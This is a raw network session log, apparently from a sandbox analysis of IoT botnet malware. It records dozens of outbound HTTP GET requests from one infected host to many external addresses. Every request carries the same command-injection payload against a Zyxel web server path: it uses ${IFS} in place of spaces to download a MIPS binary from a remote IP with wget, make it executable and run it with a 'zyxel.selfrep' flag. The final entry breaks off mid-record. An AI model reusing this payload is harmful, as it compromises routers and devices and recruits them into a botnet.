                                                            672192.168.2.136042836.28.189.143443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572664022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            673192.168.2.135792462.23.160.118443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572709084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            674192.168.2.135871299.219.165.61443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572712898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            675192.168.2.135590490.2.105.192443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572738886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            676192.168.2.1334864222.255.159.11443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572770119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            677192.168.2.135117463.138.44.19443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572822094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            678192.168.2.1355820202.116.63.27443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572894096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            679192.168.2.135832839.33.176.96443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572894096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            680192.168.2.134719248.252.175.196443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572948933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            681192.168.2.135192827.219.117.36443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.572983027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            682192.168.2.1335108206.185.168.69443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.573043108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            683192.168.2.1351114161.174.55.133443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.573062897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            684192.168.2.134717425.6.245.207443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.573120117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            685192.168.2.133636418.48.188.163443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.579653978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            686192.168.2.134530878.21.2.184443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.579839945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            687192.168.2.13605444.146.250.195443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.579875946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            688192.168.2.1348146197.37.203.65443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:30.585993052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            689192.168.2.1360376217.115.66.134443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:30.586020947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            690192.168.2.1357378123.242.124.152443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:30.586103916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            691192.168.2.1339984118.107.107.169443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:30.586107969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            692192.168.2.1338170191.29.104.248443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:30.586132050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            693192.168.2.1345230140.120.47.133443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:31.595627069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            694192.168.2.1336450201.172.31.108443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:31.595669031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            695192.168.2.135325859.216.21.141443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:31.595706940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            696192.168.2.133819870.72.241.220443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:31.595741034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            697192.168.2.133298239.6.202.208443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:31.595760107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            698192.168.2.1347416179.146.95.220443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:31.595876932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            699192.168.2.1344814111.231.72.102443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600323915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            700192.168.2.1338020194.148.144.81443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600378036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            701192.168.2.1357252179.128.33.195443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600398064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            702192.168.2.135873214.126.201.16443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600419044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            703192.168.2.1335692196.154.120.174443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600455999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            704192.168.2.135129293.255.38.11443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600502968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            705192.168.2.1341776122.199.30.162443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600521088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            706192.168.2.134584064.42.201.212443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600568056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            707192.168.2.1352848149.176.218.34443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600594044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            708192.168.2.1353028174.209.9.245443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600636005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            709192.168.2.1356188165.75.52.204443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600668907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            710192.168.2.1351016148.102.213.141443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600696087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            711192.168.2.1360696105.155.108.95443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600743055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            712192.168.2.1339964203.201.223.149443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600780964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            713192.168.2.135523647.54.87.90443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600830078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            714192.168.2.1356234109.15.53.243443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600862026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            715192.168.2.1336624188.83.34.61443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.600900888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            716192.168.2.134998447.203.228.92443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.601089001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            717192.168.2.134401295.244.209.163443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:32.601156950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            718192.168.2.1349702136.149.150.157443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:33.613214970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            719192.168.2.135960489.210.181.123443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:33.613266945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            720192.168.2.133773878.100.66.248443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:33.613306999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            721192.168.2.134039632.181.83.44443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:33.613379955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            722192.168.2.1342602139.172.173.167443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:33.613415956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            723192.168.2.134162435.208.32.105443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:34.619865894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            724192.168.2.1345434189.136.124.147443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:34.619935036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            725192.168.2.134419251.197.68.134443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:34.619982958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            726192.168.2.1339340222.196.253.243443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:34.620028973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            727192.168.2.136099283.11.106.32443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:34.620055914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            728192.168.2.133824462.32.86.44443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:34.620106936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            729192.168.2.1357236150.207.117.158443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:34.620126963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            730192.168.2.1354116200.116.250.150443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:35.661515951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            731192.168.2.1335452168.159.197.134443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:35.661540031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            732192.168.2.1334090141.73.32.155443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:35.661560059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            733192.168.2.1342070131.101.30.172443
                                                            TimestampBytes transferredDirectionData
